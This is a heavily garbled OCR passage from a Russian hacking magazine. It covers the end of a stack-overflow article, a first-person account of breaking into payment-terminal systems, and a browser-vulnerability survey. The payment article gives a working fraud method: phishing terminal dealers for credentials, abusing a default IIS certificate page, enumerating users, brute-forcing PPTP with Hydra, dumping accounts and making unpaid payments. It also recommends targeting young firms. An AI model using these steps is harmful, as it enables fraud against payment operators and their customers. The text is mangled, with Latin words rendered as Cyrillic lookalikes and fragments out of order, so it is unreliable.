зависимости от настроения линкера там может находиться и секция 
данных, и таблица импорта (у динамических библиотек — таблица 
экспорта), и секция ресурсов — да мало ли что еще. Наибольший 
интерес, естественно, представляют данные, доступные для запи- 
си, и экспорт/импорт. 

Стек главного потока расположен в самом начале адресного про- 
странства, и при его переполнении затирать ему совершенно нечего, 
а вот стеки последующих потоков расположены за концом образа 
исполняемого файла, и при их переполнении начинаетзатираться 
содержимое секции данных, доступной как на чтение, так и на запись! 
Однако если область за концом страничного образа уже занята, то 
пространство под стек выделяется в другом месте адресного про- 
странства, например за блоком памяти, принадлежащим куче. Самое 
интересное, что стратегия выделения памяти под стековое про- 
странство стремится к максимально плотному заполнению адресного 
пространства, и потому перед стеком практически всегда находится 
что-то полезное и только в редких случаях — невыделенная область 
памяти, что происходит, например, при освобождении памяти или 
завершении потока, владеющего данным регионом. 

Но как бы там ни было, к атакам такого типа не готовы ни спе- 
циалисты по безопасности, ни программисты. И пока те будут 
собираться с мыслями, хакеры могут спокойно анализировать 
программы, многие из которых допускают двойное переполнение 
стека с подавлением исключения ЕХСЕРТІ0І\І_5ТАСК_0ѴЕІ?РІ_0ѴѴ. 
Списоктаких программ я по некоторым соображением не привожу, 
но вот саму идею с удовольствием выкладываю на всеобщее 
обозрение. ц-ц 
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ВЗЛОМ СЕТЕЙ платежныхтерминалов 



В одном из прошлых номеров ] [ была статья «Взлом платежных терминалов», в которой 



описывались составляющие аппарата, его функциональные части и способ защиты 



терминала от взлома. Я прочитал статью несколько раз, но даже между строчек не нашел 



реальных путей его взлома. Понятно, что физически ломать его не следует — если пой- 



мают, оторвут все что нащупают. Но мое желание найти баг в защите было непреодоли- 



мым. 






^ КАК ВСЕ НАЧИНАЛОСЬ 

Первое, что мне пришло в голову, — это нагуглить как можно больше контор, 
которые занимаются написанием софта для платежныхтерминалов, и пос- 
мотреть наличие программ, описаний протоколов и исходников на их сай- 
тах. Предупреждаю заранее: по понятным соображениям некоторые детали 
взломов в статье опущены, а совпадения и сходство названий платежных 
систем с существующими являются чистой случайностью. Признаюсь чест- 
но, для досконального изучения платежных систем и их протоколов оплаты 
мне потребовалось немало времени. Покопавшись в результатах поиска, я 
получил приличный списокѵѵеЬ-адресов. После подробного изучения их 
содержимого передо мной вырисовалась довольно четкая картина, точнее 
схема, по которой проходит платеж от клиента до оператора сотовой связи 



или поставщика коммунальных услуг (далее всех буду называть просто 
«поста в щи к услуг»). 

^ ОБЩИЙ РАСКЛАД 

Все платежи делятся на онлайн и оффлайн. Онлайн — это платеж, который 
доходит до поставщика услуг незамедлительно, через интернет. Оф- 
флайн — это платежи, которые накапливаются в базе данных платежной 
системы, и через определенные промежутки времени отправляются на 
сервер поставщика услуг. Крометого, некоторые поставщики принимают 
только бумажные реестры. То есть обмен происходит непосредственно при 
участии человека и поставщика услуг. Онлайн-платежами, как правило, 
оперируютпровайдеры сотовой связи. Коммунальщики же предпочитают 
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получать платежи «оптом» один раз в сутки-двое. Сама по себе концепция 
онлайн-платежа уже небезопасна, потому как, проводя такие платежи в 
большом количестве, работники платежных систем не очень справляются с 
их разгребанием. 

Искать баги в ресурсах поставщиков бессмысленно. Времени уйдетуйма, а 
результат можно получить и более простым способом. Доверяя проведение 
платежей платежным системам, поставщик не рискует абсолютно ничем. 
«Живые» деньги поступят к нему в любом случае, а ошибки и возможность 
взлома — это уже проблемы посредников. Таким образом, для того чтобы, 
например, пополнить баланс на сотовом телефоне, совсем не обязательно 
иметь доступ к оператору связи. Достаточно получить доступ к одной из 
платежных систем, которые позволяют совершить платеж в пользу этого 
оператора. 

Как правило, начинающие платежные системы откладывают решение воп- 
роса безопасности на потом, делая акцент на скорости и удобстве сервиса. 
Поэтому при выборе жертвы в первую очередь стоит обратить внимание на 
молодые компании. Хотя никто не говорил, что гиганты платежной индус- 
трии не имеют ошибок в системах безопасности. Очень часто происходит 
как раз наоборот... Возьмем, к примеру, недавний случай с небезызвес- 
тной конторой ОСМП («Офигенная система моментальных платежей»). 
Центральный сервер, к которому обращаются тысячитерминалов России, 
Казахстана и, возможно, других стран, был парализован на несколько суток 
банальной 0о5/00о5-атакой. Я, правда, не в курсе, воспользовался ли 
кто-нибудь ситуацией в своих корыстных целях или просто похулиганили, 
но атака была, и это факт. 

Связь терминала с сервером происходит по О РП5/65М- каналу и, как 
правило, посредством технологии ХМІ_-РРС. Некоторые даже доду- 
мываются навешивать 851-защиту, но, чтобы она действительно оправ- 
дывала себя, во-первых, протокол должен быть закрытым, во-вторых, 
передаваемый пакет должен шифроваться также средствами програм- 
мы, и в-третьих, сервер должен не только предоставлять свой корневой 
сертификат, но и требовать клиентский. Не буду голословным и приведу 
примеры. 

У той же ОСМП протокол передачи открыт, то есть шифровать пакет на 
выходе из программы уже не имеетсмысла. Получать его реверс-инжи- 
нирингом будеттолько извращенец. Но их сервер нетребует клиентского 
сертификата, то есть отправить запрос можетлюбой желающий, пра- 
вильным образом сформировавший пакет. Да, твой канал при передаче 
будет защищен, но кого это интересует, если для взлома нужны только 
идентификационные данные. Ведь получить их при большом желании 
не составит труда. Здесь и социальная инженерия, и НЛП, и банальный 
хакингтебе в помощь. Еще одну интересную брешь я нашел сразу в 
двух молодых конторах. В ответ на мой Р05Т-запрос сервер послал 
меня в сторону НТТР5 явным проявлением в содержимом ошибки 115- 
ного акцента. Как известно, по умолчанию 115-сервер устанавливает 



центр выдачи сертификатов в каталог/Сег^гѵ/Ое^аиІІ.азр, последо- 
вав в который я в три клика получил свой собственный клиентский 
сертификат. Кстати, после этого мне удалось овладеть доступом даже 
к А5РХ-странице для проведения платежей и их просмотра, хотя на 
одном из ресурсов страница была защищена паролем, раздобыть 
который мне так и не посчастливилось. 

Большинство платежных систем ставит на свои серверы ѴѴіпсІоѵѵв 2000/2003 
5егѵег, чем уже совершает большую ошибку. Нотот, кто принимает платежи 
в Му5СН_-базу на Біпих-сервере, при этом держа на борту АрасИе+РНР, 
ошибается еще больше. Не мнетебя учить, как пользоваться ЗОЫщесбоп, 
а ведь это очень простой и верный способ получения огромного количес- 
тва необходимых данных для проведения платежей, имитируя платежный 
терминал. 

^ ИЩЕМ ДЫРЫ 

При поиске дыр в защите платежной системы, выбранной в качествежер- 
твы, первое, что стоит сделать, — сканирование портов и ѵѵеЬ- контента. На 
открытых портах зачастую можно найти интересные самописные сервисы 
для проведения платежей, администрирования терминалов. Ведь ни один 
работник не будет работать круглосуточно вместе с платежными терми- 
налами. Программеры и сисадмины придумывают различные примочки 
удаленного управления для собственного удобства. Зачастую они даже не 
задумываются о защите, надеясь, что никто и не подумает их ломать. 

К некоторым портам можно попробовать ломануться по Теіпеі, но, как 
показывает практика, в основном такие сервисы работают по техно- 
логии ХМБ-ПРС, а это означает, что порт можеттолько принимать и 
отправлять Р05Т-запросы. Какузнать структуру запроса и его содер- 
жимое? Можно попробовать просканить веб-содержимое на чтение. 
Многие пишутсвои сервисы с использованием А5Р-страниц, которые 
требуютсвоих исходников в техже каталогах. Если администратор в 
последнюю очередь думает о правах доступа, есть большая вероятность 
прочитать исходники авр-сценариев, что при грамотном использова- 
нии может помочь составить ХМБ-запрос. Кстати, подобные дыры были 
зафиксированы даже у достаточно крупных платежных систем! 
ѴѴеЬ-контент лучше исследовать вручную, плюс сканером. В качестве 
сканера лично мне больше всего нравится Х5рісІег. Совсем недавно мне 
по спутниковой рыбалке прилетела бесплатная версия 7.5 от2еготад 
Баб. 

^ ТРИ РЕАЛЬНЫХ ВЗЛОМА 

гоо\ ѵзНіЬегРІаІ: 

Как показало исследование, платежная система НіЬегРІаІ: принимает пла- 
тежи во многих странах и их сайты хостятся на одном сервере. Проверить 
это достаточно просто. Достаточно ввести доменное имя или ІР-адрес в 
поисковый запрос на мѵѵѵѵ.сіогпаіпгсІЬ.пеС 
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Раздел Ооѵѵпіоасіз на официальном сайте ОСМП. Здесь можно найти 
много интересного 



Интересная картина получается: 

1. ЬіЬегсЬеск.ги [ѵЛюів] ІР: 0.0. 0.0 сіпз : пз .ЬіЬегрІак . 
ги I ргоху . МЬегрІаі: . сот 

2. ЬіЬегрІаІ: . ги [ѵйіоіз] ІР: 213.33.161.9 сіпз: пз.сіетоз. 
зи I пз . ЬіЬегрІаб . ги 

3. ЬіЬегроз.ги [ілгЬоіз] ІР: 0.0. 0.0 сіпз: пз .ЬіЬегрІаР .ги 
I ргоху . ЬіЬегр Іа ь . сот 

4. ЬіЬегсагсІ. ги [ѵЛюіз] ІР: 0.0. 0.0 сіпз: пз . ЬіЬегрІаС . 
сот | пз .ЬіЬегрІаР . ги 

5. педгіЬоѵ.ги [хѵЬоіз] ІР: 0.0. 0.0 сіпз: пз .ЬіЬегрІаС . сот 
I пз .ЬіЬегрІаС .ги 

6. періпзаіе.ги [ѵЛюіз] ІР: 0.0. 0.0 Ьпз : пз .ЬіЬегрІаС . 
сот | пз .ЬіЬегрІаР . ги 

7. періакіпа . ги [ѵйюіз] ІР: 0.0. 0.0 сіпз: пз .ЬіЬегрІаІ: . ги 
I пз .періакіпа.ги 

8. пегосіпое-роіе . ги [ѵ/Ьоіз] ІР: 0.0. 0.0 сіпз : пз . сіетоз . зи 
I пз . ЬіЬегрІаС . ги 

9. пегосіпоероіе . ги [ѵ/Ьоіз] ІР: 0.0. 0.0 сіпз : пз.сіетоз. зи 
I пз . ЬіЬегрІаС . ги 



Домены зарегистрированы, но недоступны. Скорее всего, их оставили 
для личного пользования. Но это не так важно. Остальные сайты в других 
странах показали в роли первичного 0Ы5 ЫЬегрІаЬсот, а вторичным стоял 
ЫЬегрІаЬги. Это могло означать только то, что центральный сервер один, но 
на нем хостится несколько НіЬегРІаІ-сайтов для разных стран. Пинговались 
они, кстати, тоже по одному айпишнику. 

Сканирование и ручное исследование показали, что лучше оставить эту 
затею и покопаться в другом месте. Тогда был оперативно сгенерирован 
другой способ. 

Нагуглив в кармане немного деньжат, я дошел до ближайшего 
НіЬегРІаСовского терминала, закинул на мобильник чисто симво- 
лическую сумму и получил квитанцию. Оказалось, что владельцем 
терминала был далеко не И і Ье гРІаі, а совсем левая контора, которая 
просто-напросто выступала дилером. Дилерские программы — это 
основа распространения платежныхтерминалов. Контора покупает 
автомат, ставит на своей территории и получает свой процент с прове- 
денных платежей. 

Недолго думая я позвонил по конта ктномутелефону, указанному на кви- 
танции, и попросил их дать свой етаіі — якобы для отправки мифического 
коммерческого предложения. 



Схема оплаты с бажной платежной системой 
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Программа для проведения платежей, написанная за 10 минут 



Через несколько минутписьмо отадминистрации сервиса НіЬегРІа{ 
полетело жертве на ящик (как подделывается адресат, ни для кого ведь не 
секрет). В письме не было ничего особенного. Стандартная история о смене 
оборудования на сервере итому подобном, в связи с чем, мол, просим Вас 
выслать Ваши регистрационные данные, которые нам просто жизненно 
необходимы, чтобы Ваш терминал не загнулся :). 

Послушные овцы прислали мне все свои регистрационные данные через 
пару часов. После этого был сгенерирован ХМІ_-файл, который полетел 
Р05Т-запросом на сервер платежной системы. 

Кстати, на их сайте лежит не только все описание протокола, но и исходники 
программы, устанавливаемой на стороне терминала, а также ее скомпили- 
рованная версия. 

гоо* ѵгОиіскРгау 

Программистам этой конторы я вообще поражаюсь. Сделали красивый 
дизайн на флеше, а об отладке своей проги, по-моему, вообще не думают. 
Откроютебе небольшой секрет: при определенных комбинациях действий 
на сенсорном экранетерминала программа вылетает, даже не выдав ошиб- 
ку. Причем здесь интересен еще один момент. Все сенсорные мониторы на 
сегодняшний день поддерживают несколько режимов: 

1. Сііск оп Доисіі 

2. Сііск оп геіеазе 

3. Бгад апсі сііск 

4. Бгад апсі сіоиЫе сііск 



Эксплойт отработал удачно и нашел двух пользователей — гооі и аіех. 
Дальше за дело принялась Нубга. Я зарядил несколько увесистых словарей 
и подготовил скрипт для генерирования словарей, имитирующих посим- 
вольный перебор, но до нихделотаки не дошло. Все оказалось гораздо 
проще. Пароль для аіех’а был очень простой и даже находился где-то в 
начале словаря. 

Что было дальше, думаю, не стоит рассказывать. Еще немного поработав, 
я получил доступ кбазетерминалов иуспешнослил несколько аккаунтов. 
Пароли, конечно, были хэшированы, но их расшифровыватья не стал. 
Естественно, я даже и не рассчитывал остаться незамеченным, но пока 
страждущие админы в течение нескольких дней закрывали дыру, мне 
удалось провести добрую порцию платежей. 

В СТОИТ ЛИ ОВЧИНКА ВЫДЕЛКИ? 

Сама возможность получения чего-то на халяву уже заставляет человека 
совершать какие-то телодвижения. Главное в этом деле не жадничать и 
чтить Уголовный кодекс. Но факт остается фактом: хакер может проводить 
практически любые платежи абсолютно бесплатно нажатием нескольких 
кнопок в своей самописной программе. 

Хочу оговориться: все вышеописанное в статье было сообщено админист- 
раторам платежных систем, которые, в свою очередь, поспешили прикрыть 
дыры. И еще:ты уже большой мальчик, и за все проведенныетобой 
платежи ты будешь отвечать по полной программе сам. Автор и редакция 
журнала тебя предупредили и ктвоим возможным противоправным деяни- 
ям никакого отношения иметь не будут, т 



Это как минимум... То есть, какты понимаешь, можно отключить все воз- 
можности, кроме простого нажатия нарисованных кнопок. Но ведь нетже! 
Квалифицированные мастера сервисного обслуживания и не подумали 
ничего отключать. Наверное, посчитали, что тогда им будет неудобно 
о бслужи вать те р м и н а л ы ! 

Таким образом, на разныхтерминалах этой конторы мнеудалось получить 
доступ к рабочему столу (да, неудивляйся.там стоитобычная Винда, не- 
смотря на то что на сайте написано Ыпих), «Моему компьютеру» и каталогу с 
программой со всеми вытекающими последствиями. 

гоо^ѵгОСМП 

С этой конторой пришлось немного попотеть. Просканировав порты, птар 
нащупал открытый и нефильтруемый ррірб-демон на стандартном порту 1 723. 
Таккакдля подбора пароля у нас существуетТНС Нубга, дело оставалось за 
именами пользователей. База данных пользователей РРТР очень часто не 
имеет ничего общего с базой данных пользователей сервера, но далеко не 
всегда. Зачастую Василий Пупкин создает одного и того же пользователя 
ѵавуа везде, где только возможно. Поэтому, получив версию АрасЬе-демона, я 
вспомнил про старую уязвимость с определением имен пользователей через 
ѵѵеЬ-доступ. Через несколько минутэксплойтбыл готов к работе. 



Снимокэкрана глючного платежного терминала ОиіскРгау 
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КРИС КАСПЕРСКИі 



БУНТ МАШИН 
И ВОССТАНИЕ ЧЕРВЕ 



ПАРАД БАГОВ В ПОПУЛЯРНЫХ БРАУЗЕРАХ 



Кто-то верит в Деда Мороза, а кто-то в браузеры без дыр. Попытка оспорить постулат 




□ тремительный рост уязвимостей в пятой (и особенно 

шестой) версии ІЕ вынудил продвинутых пользователей 
перейти на альтернативные браузеры, на которые хакеры 
уже давно перешли (ну, хакеры — они всегда в авангарде 
:)). Конкуренты четко просекли ситуацию, сделав ставку на безопасность: 
«С Рігеіюх Вы повысите свою безопасность и удобство серфинга», «Орега 
предоставляет самый быстрый, безопасный и простой в использова- 
нии браузер». Не отстает от них и М іеговой, но при всей агрессивности 
маркетинга последней ее рекламе больше никто не верит, и ошибки в ІЕ 
обнаруживаются чуть ли не ежедневно, а каждая шестая среди них кри- 
тическая. Не браузер, а сплошное решето. Работать с ним и шарахаться 
от каждого шороха способны либо экстремалы, либо чайники. Остальные 



уже давно забили и мигрировали в иные миры, откуда уже не возвраща- 
ются. Действительно, посидев на Горящем Лисе или Опере недельку- 
другую, работать под ІЕ больше не хочется. 

Что-то у конкурентов реализовано получше, что-то — похуже, но дело 
ведь не в качестве кода и удобстве использования, а в безопасности! 
Ругая ІЕ, поклонники альтернативных браузеров совершенно напле- 
вательски относятся к собственной Бесигііу, не следят за новостями, не 
скачиваютобновлений и вообще ведут себя так, какбудто ни дыр, ни 
хакеров, ни прочихугроз в природе не существует. Междутем дыры есть 
везде, втом числе и втекстовых браузерахтипа Рыся, просто о них не- 
принято говорить. Почему? Очень просто. МісгозоЛ первая попадает под 
перекрестный огонь специалистов по безопасности и сетевых обозре- 
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вателей, а продукция сторонних фирм традиционно остается в стороне, 
к тому же журнальный бизнес придерживается правила «бей сильных 
и не ввязывайся в священные войны». Писать о дырах в Лисе зачастую 
просто небезопасно. Тут же закидают гнилыми помидорами и тухлыми 
яйцами. А вот дыры в ІЕ — это почетно! 

Ладно, оставляем лирику и переходим к статистике. 

г ГОРЯЧИЙЛИС 

Ріге^ох, собранный на обломках заживо похороненного (а затем эксгу- 
мированного и реанимированного) Ыеізсаре, просто не можетбыть на- 
дежным браузером по определению. Фирма Ыеізсаре была первой, кому 
пришла в голову мысль внедрить в браузер поддержку ^ѵа-скриптов, и 
дыры в Ыеізсаре водились уже тогда, когда Билл Гейтс еще не вкурил в 
интернет, и не помышляя, что интернет — это тема. 

Войну между МісгозоЛ и Ыеізсаре мы оставим на растерзание исто- 
рикам (им же тоже нужно чем-то питаться), а сами сосредоточимся на 
достигнутых результатах. Ыеізсаре раскрыла исходные тексты своего 
продукта и начала привлекать к разработке всех желающих, но желаю- 
щих не было, и кворума собрать не удалось. Кому из опытных програм- 
мистов интересно тратить время и силы на мертвый проект, не получая 
ни прибыли, ни отдачи, в смысле — ни удовлетворения, ни денег? Чтобы 
собрать команду, понадобилось несколько лет, и мало-помалу новый 
продукт (окрещенный Горящим Лисом, или по-английски РігеГох’ом) 
стал завоевывать рынок. 

Первые версии Лиса были ужасны. Часть сайтов вообще не открывалась 
или отображалась неправильно, оперативная память стремительно 
утекала, производительность (а точнее, полное отсутствие таковой) 
настойчиво напоминала о себе с первой до последней минуты работы с 
Горящим Лисом, требуя его периодического перезапуска (чтобы вернуть 
системе утекшую память). 

А чему удивляться? Код Лиса написан на смеси приплюснутого Сии 
жабы, а жаба — это уже тормоза. Причем если ІЕ разбит на множество 
динамических библиотек, загружаемых в память по мере необходимости 
(и даже базовые библиотеки грузятся одновременно с отображением 
пользовательского интерфейса, создавая иллюзию быстрого старта), то 
у Горящего Лиса все свалено в огромный исполняемый файл. Ну разве 
можно так делать?! Но это еще что. Настройки браузера разбросаны по 
сотням файлов, эти файлы представлены в текстовом формате, и при 
каждом своем запуске браузер вынужден парсить их заново. Вот, такая, 
значит, у них оптимизация. 




боодіе способен анализировать ѵѵеЬ-страницы и распознавать контент, 
атакующий браузер 

С низкой скоростью работы можно было бы и смириться (зачем торо- 
питься на кладбище?), но только не с катастрофической ситуацией с 
безопасностью. Компоненты браузера, написанные на жабе, освобож- 
дают его от ряда «врожденных болезней» языка Си типа переполняю- 
щихся буферов, которыми так знаменит ІЕ, но в Лисе довольно много 
приплюснутого кода, и ошибки переполнения (ведущие кудаленному 
захвату управления компьютером) в нем все-таки имеются, пускай в 
меньших количествах, чем в ІЕ. Плюс общие ошибки дизайна и кривой 
(изначально) НТМІ_-движок, добавление новых фич в который ломает 
всю систему безопасности, образуя многочисленные дыры по всему 
охраняемому периметру. 

А чего еще можно ожидать от «базарного» стиля программирования, 
когда квалификация разработчиков варьируется в очень широких пре- 
делах и любой пионер (ну не совсем любой, конечно) может вносить из- 
менения в код, не согласуя их с более опытными товарищами, которые, 



Внешний вид Горящего Лиса 
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Это не след от НЛО, это поклонники Горящего Лиса оттягиваются 



обнаружив подобную самодеятельность, сначала хватаются за валидол, 
а потом за голову? Подписавшись на рассылку для разработчиков (или 
покопавшись в ее архиве), очень быстро устаешь от «креативной» пио- 
нерии, которая сначала что-то делает, а потом думает, что оно сделала и 
как с этим жить. 

Впрочем, мы вновьуглубились в лирику, а обещали статистику. ОК, от- 
крываем уууууут^есш^ прямо в Лисе), вбиваем в строку 

поиска Моііііа Рі геГох и получаем 6 страниц уязвимостей по 30 штук в 
каждой, причем целый ряд уязвимостей носит множественный характер. 

На самом деле в Горящем Лисе за всю его историю найдено не -180 дыр, 
а намного больше. Тот факт, что большинствоуязвимостей обнаруживают 
сами же разработчики, оперативно затыкая их, ничего не меняет. Другой 
вопрос, что сообщение о дыре — это всего лишь текст, а не исполняемый 
файл, и вовсе не очевидно, что эта уязвимость действительно представляет 
реальную угрозу. Атакующему предстоит не только разобраться в техни- 
ческих аспектах (которые обычно не разглашаются), но и решить многие 
другие проблемы. 

Короче говоря, не каждая дыра — это нора. Угроза исходит главным об- 
разом от публичных эксплойтов, которыми может воспользоваться любой 
желающий. Ему и хакером быть необязательно. Навыков продвинутого 




Дыры, обнаруженные в Рысе за все время его существования 



пользователя обычно оказывается вполне достаточно. А раз та к, идем на 
ѵѵѵѵѵѵ.тіІѵѵОгт.сот . вбиваем в строку поиска Рігеіох и пожинаем урожай 
— свыше 20 эксплойтов, большинство из которых работает чисто на отказ 
в обслуживании. Но имеется также достаточно много дыр, допускающих 
засылку вЬеІІ-кода с последующим захватом управления. А вот это уже не 
хухры-мухры! Это реальная опасность попасть под артобстрел или запус- 
тить червя на свой компьютер! 

Правда, реальных случаев атак на Горящего Лиса зарегистрировано 
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Статистика по дырам, обнаруженным за 2007 год 
в Опере, поданным компании Зесипіа 


Статистика по дырам, обнаруженным за 2007 год С 
в Горящем Лисе, поданным компании Зесипіа в 




Плагины 

Все браузеры (за исключением, пожалуй, 
одного лишь Рыся и его текстового собрата 
Ьіпкз’а) позволяют устанавливать плагины 
сторонних производителей: АЪоЪе РБР 
Кеабег, Ріазіі Ріауег и много еще чего. А 
в этих плагинах ошибки, между прочим, 
тоже встречаются. Причем, если плагин 
портирован сразу под несколько браузе- 
ров, уязвимость приобретает масштабный 



характер. Так, например, в конце 2007 года 
была обнаружена серьезная дыра в Арріе 
(ЗиіскТіте Ріауег, допускающая удаленный 
захват управления и ставящая под угрозу 
и ІЕ, и Горящего Лиса, и Оперу, Сафари и 
некоторые другие десктопные и мобильные 
браузеры. При условии, конечно, что этот 
плагин на них установлен, а установлен он 
там достаточно часто. 

Ладно, если без встроенного просмотра 
РПР еще как-то можно и обойтись (хотя 
какая разница? все равно, дыра выскочит 



при открытии сохраненного документа с 
локального диска), то без РІазЬ’а живет- 
ся хреново. То есть поначалу очень даже 
хорошо живется: реклама не грузится и 
не досаждает, а развлекательные ролики 
можно посмотреть и под ІЕ. Но вот начина- 
ют попадаться сайты, где часть картинок 
выполнена при помощи Ріазіі-технологий 
(например, так поступает ѵуууѵѵ.іХВТ.сот) . и 
браузер начинает неизбежно обрастать все 
новыми плагинами. 
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Виджет для Оперы, в реальном времени отображающий количество 
незаткнутых дыр в разных браузе рах 




немного, и нет (или практически нет) ни одного червя, который правиль- 
но было бы назвать глистом, поскольку червей ловят и едят, а глисты 
заводятся сами, и попробуй потом отних избавиться! Самое неприят- 
ное, что если пользователи ІЕ в своей массе уже привыкли к его дырам и 
довольно активно качают обновления (чайников и ламеров мыв расчет 
не берем), то поклонники Горячего Лиса, уверенные в его непогреши- 
мости, не видят в обновлениях никакой необходимости, тем более что 
механизм обновлений должным образом не отлажен. Новые билды 
выходят нечасто, а качать мегабайты исходных текстов и геморроиться с 
их компиляцией — это, извините, каким же мазохистом быть надо? 
Наибольшую опасность представляютуже опубликованные, но еще 
незалатанные дыры. Для Оперы написан симпатичный виджет, торча- 
щий на рабочем столе и отображающий в реальном времени коли- 




Р^І ДывОпД 



чество критических незаткнутых дыр для всех популярных браузеров. 
«Незаткнутых» — это таких дыр, лекарства против которых еще нет, 
и неизвестно, когда оно будет. Первое место по дырам традиционно 
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занимает ІЕ (на момент публикации содержащий 7 незаткнутых дыр), 
за ним с небольшим отрывом идет Лис (5 дыр). Опера находится в 
самом конце хвоста, пропуская вперед себя ІЛЧІХ-браузеры, о которых 
мы говорить все равно не будем. 

Но все же ІЕ атакуют порядка на два, а то и на три чаще, чем Горящего 
Лиса! Почему? Ответ прост, как бумеранг: популярность Горящего Лиса 
существенно ниже, чем ІЕ, и написание червей под него просто не окупа- 
ется. Ктомуже Горящего Лиса устанавливаюттехнически продвинутые 
люди, пользующиеся целым комплексом защитных средств и распоз- 
нающие присутствие постороннего кода даже без помощи антивируса 



— им достаточно бросить беглый взгляд на диспетчер задач или Ргосезв 
Ехріогег Руссиновича. 

Растущая популярность Лиса не идет ему на пользу. Код кривой, дырявый, 
практически ничем не уступающий ІЕ. Стоиттолько ему существенно потес- 
нить ІЕ, кактысячи хакеров бросятся на поиски дыр (благо исходные тексты 
доступны) и начнутписать червей одного за другим. Выдержитли Горячий 
Лис их натиск? Ста ким подходом к разработке — наврядли. Впрочем, не 
будем строить прогнозов, а предоставим событиям возможность разви- 
ваться собственным путем. 

^ ОПЕРА 

Браузер с закрытыми исходными текстами, но, в отличие от Лиса 
(основанного на кодах ІЧеІзсаре) и ІЕ (построенного на базе Мозаіс), 
разработанный с чистого листа и спроектированный сплоченной 
командой весьма неглупых людей. По быстродействию, надежности и 
удобству пользования Опера рвет конкурентов кактузик грелку, причем 
большинство новых фичей появляется сначала именно в Опере и только 
потом у конкурентов. 

Единственный недостаток Оперы (по сравнению с Лисом) — крайне 
куцая коллекция расширений. Если для Лиса можно найти любое 
расширение, какое только нужно (или на худой конец написать его 
самостоятельно), то в Опере расширения (виджеты) появились лишь 
недавно. Число их невелико, а функциональность жестко ограничена 
архитектурой, и в основном все программисты пишут гаджеты типа 
трехмерных часов, календарей, органайзеров, индикаторов погоды и 
прочей фигни. А вот научить УоиТиЬе сохранять потоковое видео в фор- 
мате тред4 — слабо? А ведь для Лиса таких расширений намного больше 
одного. Лично я написал пару расширений для ѵѵѵѵѵѵ.соііагте.сот . чтобы 
с ним можно было работать без помощи мыши — одной лишь клавиа- 
турой. Для Оперы в силу ограничений, наложенных на виджеты, такую 
штуку написать уже не получается (или я просто не разобрался, какэто 
сделать). 

Ошибокв Опере нето чтобы совсем нет, но явно меньше, чем в Горящем 
Лисе. Бесигііу Росиз выдает четыре страницы ошибок (против шести в 
РігеРох), правда многие из них критические, то есть допускают возможность 
удаленного выполнения вЬеН-кода, ведущего кзахвату системы, а это 
очень нехорошо. 

На \ллллл/.ті[\л/Огт.согп валяется около 1 5 боевых эксплойтов, работающих 
главным образом на отказ в обслуживании, но есть среди них и парочка 
таких, которые забрасывают збеИ- код, причем какдля старых версий 



Расширения 

В той или иной мере расширения поддержи- 
вают все браузеры (кроме текстовых, конеч- 
но), и коллекция этих расширений обычно 
находится прямо на официальном сервере 
компании-разработчика. Вот только пишутся 
эти расширения кем попало, а потому таят в 
себе скрытую угрозу. 

Наткнувшись на пару расширений для 
Горящего Лиса, незаметно ворующих пароли 
с кукисов, я ради эксперимента создал «тро- 
янское» расширение (в кавычках, потому 
что зловредность его заключалась в грозного 
вида диалоговом окне с надписью: «Сейчас 
вам будет нехорошо, а потом еще хуже») . Я 
был просто ошеломлен, насколько проста 
оказалась процедура регистрации и каких 
усилий стояло закачать «троянское» расши- 
рение в общий доступ. Никаких. В смысле 



усилий. Просто берешь и закачиваешь. И 
прежде чем разъяренные пользователи 
успели написать абузу, «троянца» скачало 
и установило нехилое количество человек. 

И ведь это был явный «троян», а если бы он 
действовал тихо, скрытно и незаметно, что 
тогда? 

Сразу же возникает вопрос: какими полно- 
мочиями обладают расширения? Ответ: раз- 
работчики браузера приложили определен- 
ные усилия, чтобы эти самые полномочия 
не выходили за рамки приличий, ограни- 
чиваясь действиями, совершаемыми над 
текущей страницей браузера. А у Лиса еще и 
над его настройками (что дает возможность 
незаметно прописать хакерский прокси- 
сервер для кражи трафика, а потом быстро 
все вернуть обратно, и никто ничего не 
заметит) . Отформатировать диск или внед- 
рить вирус в исполняемые файлы расшире- 
ния не могут. Теоретически. Практически 



же они написаны на жабе, и для ускорения 
их выполнения браузеры автоматически 
компилируют их код в память, а ошибок в 
этих компиляторах очень много. Передать 
управление на заранее подготовленный 
машинный код после такой компиляции 
плевое дело, а машинный код может практи- 
чески все. Имеются и другие просчеты, как 
в механизме взаимодействия расширений с 
браузером, так и в жаба-машинах. 

Короче говоря, расширения небезопасны, 
особенно Лисьи. У Оперы в этом смысле 
дела обстоят намного лучше, но все-таки 
потенциальная угроза атаки остается вполне 
реальной и осязаемой. А потому ни в коем 
случае не скачивай расширения, прежде чем 
их не скачает толпа народу и не убедится в их 
праведности. Во всяком случае, антивирусы 
распознавать нехорошие расширения еще 
не научились и навряд ли озаботятся этой 
проблемой в дальнейшем. 



► 062 



ХАКЕР 02 /110/ 08 



взлом 



>> 




Эксплойты для Рыся 

Оперы, так и для новых. На сайте компании нет ни одного ресурса, хотя бы 
косвенно относящегося к безопасности (есть только рекламный логотип, 
типа Опера самая безопасная]. Какиетам упоминания о дырах или история 
исправлений! Даже у ненавистной всем М іеговой все это есть, не говоря 
уже о Лисе. В любую минуту зашел, полистал список новых багов, почитал, 
чем они чреваты, и вздохнув принялся скачивать обновления или всю 
версию браузера целиком. 

Маленький секрет. На РТР-сайте компании можно найти намного 
больше, чем в ѵѵеЬ’е, в том числе и версии с залатанными дырами, еще 
не выложенные в ѵѵеЬ. Что за странная политика такая — не знаю. От 
атак Оперу спасает лишь относительно невысокая распространенность 
последней. Мне не известен ни один хакерский сайт, сконструирован- 
ный специально для обстрела Оперы (Лис под удары несколько раз уже 
попадал, правда все заканчивалось благополучно и зараза благодаря 
Ргосезз Ехріогег’у Руссиновича подбивалась еще на излете]. Закры- 
тость исходных кодов и относительно частый выход новых версий 
также существенно повышают цену атаки. 

В РЫСЬ 

Рысем зовут текстовый браузер (он же І_упх], весьма популярный в неко- 
торых кругах и горячо любимый мной. Графику не поддерживает, картинки 
не грузит, управляется с клавиатуры и серфитстакой скоростью, что только 
ветер в ушах свистит. Перевариваеттолько базовыетэги НТМІ_(да итоне 
все], скрипты не видитвупор, не говоря уже о всякихтам плавающихфрей- 
мах. Казалось бы, ну какие ошибки при такой простоте? Тем более что новые 
версии практически не выходят. Да и зачем новые, когда есть неплохо 
работающие старые? 

Тем не менее ЭесигТу Росив показывает целых восемь ошибок, а на ѵѵѵѵѵѵ. 
тіІѵѵОггп.согп находятся два эксплойта, захватывающие управление 
компьютером без всякихтам отказов в обслуживании, что буквально шо- 
кировало меня, до этого верящего, что в Рысе ошибок нети не будет. А оно 
